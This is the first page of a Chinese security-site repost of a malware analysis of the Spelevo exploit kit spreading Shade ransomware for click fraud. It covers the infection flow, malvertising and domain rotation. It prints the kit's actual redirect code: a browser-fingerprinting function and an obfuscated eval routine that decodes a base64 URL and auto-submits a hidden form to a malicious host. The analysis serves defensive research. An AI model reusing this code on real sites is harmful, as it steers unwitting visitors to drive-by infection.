欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

Shade+Spelevo Exploit Kit,一种隐秘的点击欺诈手段

来源:本站整理 作者:佚名 时间:2019-07-31 TAG: 我要投稿

摘要
本文主要介绍Cybereason团队观察到的漏洞利用工具包Spelevo,并细述其漏洞利用、感染方法,以及传播Shade勒索软件的过程。
介绍
Cybereason团队注意到,今年以来针对日本的漏洞利用工具包(EK)开发活动呈增长趋势,原因可能是因为在日本老旧的操作系统相对较多。此次观察到的新工具包于今年三月初发现。
有报告称,EK开发人员的投入和回报往往不成正比,相比较他们投入的时间金钱,所获得的利润并不大。
此外,绝大多数漏洞利用工具包仅对微软的Internet Explorer有效,随着近年来谷歌Chrome和Firefox浏览器的日益普及,只剩下很少的用户在用Internet Explorer。
与Internet Explorer相比,Chrome和Firefox不仅功能上更为完善,且更能保障用户的安全,
比如后者拒绝使用Adobe Flash-AX,而Adobe Flash-AX也是此次攻击者在利用漏洞时所选择的软件。Adobe Flash-AX是默认设置的,Chrome之类的浏览器都有一个有效的补丁和更新措施,且由于大多数Chrome都是默认更新,每次漏洞发布时都会自行更新,等到EK开发人员开始利用已发布漏洞时就无用武之地了。
虽然在过去几年开发工具包的活动有所减少,但我们仍会看到有新的工具包不断出现,不管原因是什么,既然已经存在,我们还是应该做好准备,同时我们看到,攻击者也在工具包中不断融入新技术升级换代。比如今年年初,Fallout漏洞利用工具包在其库中添加了对PowerShell的使用,而在本文Spelevo EK的案例中则涉及对Windows Management Instrumentation(WMI)的使用。
Spelevo类似于RIG和GrandSoft之类的EK,很可能由俄罗斯黑客组织开发,这些工具包每月的“租金”约为1000美元至1500美元。
此次攻击攻击者将Spelevo EK和Shade捆绑在一起,能在受害者难以察觉的情况下完成诈骗,这点与Shade勒索软件的主要用途有点不一样。我们之前有研究过,欺诈点击每年都在以50%的速度在增长,是快速而又隐蔽赚钱的一种方法。
技术分析

图1.Spelevo漏洞利用工具包的感染流程
Spelevo的感染机制与Fallout相似:用户浏览网页时如果访问了受感染的网站,就会被悄悄重定向到漏洞利用工具包的登录页面。过去大多数受感染的网站都是成人网站,但这次却是一个合法的电视服务网站。

图2.感染模式
漏洞利用工具包通常由流量分配系统(TDS)传播,TDS是负责流量分配的中介,能控制大量的流量,并收集攻击者可以利用的统计数据以改进攻击。攻击者可以根据地理位置、浏览器类型等控制重定向目标,以及选择攻击受害者的恶意软件类型。
Fallout和Spelevo通过HookAds恶意广告传播,基础设施也是相同的。在撰写本文时活动仍在运行,每天都会注册新域名。在我们的分析过程中,一些域已经被新的替换。

图3.Spelevo的域名
快速轮换是存活下来的原因。重定向的代码(取自todaymale[.]xyz)包括一些浏览器检查和负责进一步重定向的代码。
HOOKADS 重定向和SPELEVO登陆页面
浏览器检查:
function getBrowser() {[REDACTED] try{ var bName = function () { if (ua.search(/Edge/) > -1) return "edge"; if ((ua.search(/MSIE/) > -1) || (ua.search(/Trident/) > -1)) return "ie"; if (ua.search(/Firefox/) > -1) return "firefox"; if ((ua.search(/Opera/) > -1) || (ua.search(/OPR/) > -1)) return "opera"; if (ua.search(/YaBrowser/) > -1) return "yabrowser"; if (ua.search(/Chrome/) > -1) return "chrome"; if (ua.search(/Safari/) > -1) return "safari"; if (ua.search(/Maxthon/) > -1) return "maxthon"; else return "unknown"; }();
恶意eval重定向功能:
eval(function(a, b, c, d, e, f) { e = function(a) { return (a  35 ? String.fromCharCode(a + 29) : a.toString(36)); }; if (!"".replace(/^/, String)) { while (c--) f[e(c)] = d[c] || e(c); d = [ function(a) { return f[a]; } ]; e = function() { return "\\w+"; }; c = 1; } while (c--) if (d[c]) a = a.replace(new RegExp("\\b" + e(c) + "\\b", "g"), d[c]); return a;}('8 c="z"+"B"+"E"+"C+/"+"=";q u(1){8 5="";8 d,h,k="";8 l,a,7,b="";8 i=0;8 v=/[^A-w-x-9\\+\\/\\=]/g;e(v.D(1)){}1=1.G(/[^A-w-x-9\\+\\/\\=]/g,"");F{l=c.f(1.j(i++));a=c.f(1.j(i++));7=c.f(1.j(i++));b=c.f(1.j(i++));d=(l>4);h=((a&H)>2);k=((7&3)\';s.r[0].n.Q[0].N()}}', 62, 64, "|input||||output||enc3|var||enc2|enc4|keyStr|chr1|if|indexOf||chr2||charAt|chr3|enc1|fromCharCode|document|String|64|function|frames|window|BrowserInfo|decode64|base64test|Za|z0|form|ABCDEFGHIJKLMNOP||QRSTUVWXYZabcdef|wxyz0123456789|exec|ghijklmnopqrstuv|do|replace|15|while|innerHTML|target|body|else|submit|_parent|method|forms|aHR0cDovL2FkMy5kb2dmdW5ueXZpZGVvcy54eXovbXlkb2dneXN0eWxld2l0aHlvdXJraXR0eQ|action|post|true|write|length|return|visits|allright|getBrowser|unescape".split("|"), 0, {}));

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载